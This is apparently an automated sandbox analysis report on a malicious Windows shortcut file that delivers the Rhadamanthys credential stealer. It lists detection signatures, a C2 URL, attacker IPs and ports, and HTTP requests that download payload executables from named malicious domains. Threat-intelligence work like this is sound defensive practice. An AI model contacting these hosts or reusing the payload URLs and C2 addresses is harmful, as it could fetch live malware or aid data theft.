Windows Analysis Report
fBcMVl6ns6.lnk

Overview

General Information

Sample name: fBcMVl6ns6.lnk
renamed because original name is a hash value
Original sample name: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Analysis ID: 1529310
MD5: ae44dfe179f7ab8400c90b2d208ff313
SHA1: 7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
SHA256: 5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
Tags: lnkrocketdocs-loluser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dllhost Internet Connection
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Found malware configuration
Source: 9.2.regsvr32.exe.12909ac0.3.raw.unpack Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\ajbs50ul.bat ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Gga6.ini ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: fBcMVl6ns6.lnk ReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: fBcMVl6ns6.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:55200 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000009.00000003.1618546473.000000001B330000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1619728740.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632811056.000001F9E0530000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1632244742.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000009.00000003.1604799073.000000001C000000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1606444269.000000001C1F0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629919350.000001F9E0660000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1629243425.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D2740F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 4_2_00007FF63D2740F0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_00007FF7F04040F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 18_2_00007FF7F04040F0
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\rekeywiz.exe Code function: 4x nop then dec esp 18_2_000002A4ACB55641

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49716
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49717
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.8:49718
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.8:55203
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.8:55220
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.8:59236
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 14
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49709 -> 130.133.110.14:33445
Source: global traffic TCP traffic: 192.168.2.8:49710 -> 194.249.212.109:33445
Source: global traffic TCP traffic: 192.168.2.8:49716 -> 147.45.126.71:3752
Source: global traffic TCP traffic: 192.168.2.8:55201 -> 46.29.238.96:4872
Source: global traffic TCP traffic: 192.168.2.8:55203 -> 185.196.9.174:7777
Source: global traffic TCP traffic: 192.168.2.8:55212 -> 104.223.122.15:3389
Source: global traffic TCP traffic: 192.168.2.8:55213 -> 51.254.84.212:33445
Source: global traffic TCP traffic: 192.168.2.8:55215 -> 185.58.206.164:33445
Source: global traffic TCP traffic: 192.168.2.8:55216 -> 195.93.190.6:33445
Source: global traffic TCP traffic: 192.168.2.8:55218 -> 95.215.44.78:3389
Source: global traffic TCP traffic: 192.168.2.8:55219 -> 163.172.136.118:3389
Source: global traffic TCP traffic: 192.168.2.8:55222 -> 37.97.185.116:33445
Source: global traffic TCP traffic: 192.168.2.8:55223 -> 80.87.193.193:3389
Source: global traffic TCP traffic: 192.168.2.8:55224 -> 46.229.52.198:33445
Source: global traffic TCP traffic: 192.168.2.8:55225 -> 85.21.144.224:33445
Source: global traffic TCP traffic: 192.168.2.8:55226 -> 37.187.122.30:3389
Source: global traffic TCP traffic: 192.168.2.8:55227 -> 205.185.116.116:33445
Source: global traffic TCP traffic: 192.168.2.8:55228 -> 198.98.51.198:3389
Source: global traffic TCP traffic: 192.168.2.8:55229 -> 104.233.104.126:33445
Source: global traffic TCP traffic: 192.168.2.8:55233 -> 148.251.23.146:2306
Source: global traffic TCP traffic: 192.168.2.8:55235 -> 193.124.186.205:33445
Source: global traffic UDP traffic: 192.168.2.8:33445 -> 85.130.224.235:33445
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.8:55198 -> 162.159.36.2:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.8:49717
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.8:49718
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF63D277D80 WSARecv,WSAGetLastError, 4_2_00007FF63D277D80
Source: global traffic HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hSbtGDlbZOTf+3b&MD=DHzpRkdu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic DNS traffic detected: DNS query: 1h982d.bemostake.space
Source: global traffic DNS traffic detected: DNS query: bemostake.space
Source: global traffic DNS traffic detected: DNS query: rocketdocs.lol
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC61FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bemostake.space
Source: powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rocketdocs.lol
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000013.00000002.2125075305.000002403AAD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.$
Source: powershell.exe, 00000005.00000002.1601177938.000001F3F4E9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.w
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bemostake.space/test.txt
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://1h982d.bp24mostakp24.spacp24/tp24st.txt
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC4A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1553322256.000001F3DC7C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1597108569.000001F3F4CB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000013.00000002.1954084490.00000240224C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC5C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1664031768.000001BDD4C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1664031768.000001BDD4ACE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1582266421.000001F3EC82E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol/utox_x86.exe
Source: powershell.exe, 00000003.00000002.1576576024.000001BDC6993000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rockp24tdocs.lol/utox_x86.p24xp24
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775343730.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775144124.000001F9E0415000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000E.00000003.1775834759.000001F9E0416000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 0000000E.00000003.1774720897.000001F9E0423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 56010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56037
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58337
Source: unknown Network traffic detected: HTTP traffic on port 56973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57129
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58338
Source: unknown Network traffic detected: HTTP traffic on port 55544 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57129 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57375
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58467
Source: unknown Network traffic detected: HTTP traffic on port 58638 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56168
Source: unknown Network traffic detected: HTTP traffic on port 58317 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58466
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58221
Source: unknown Network traffic detected: HTTP traffic on port 58936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58489 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58106
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58107
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56297
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58596
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57025
Source: unknown Network traffic detected: HTTP traffic on port 55200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58595
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56296
Source: unknown Network traffic detected: HTTP traffic on port 55361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57244 -> 443
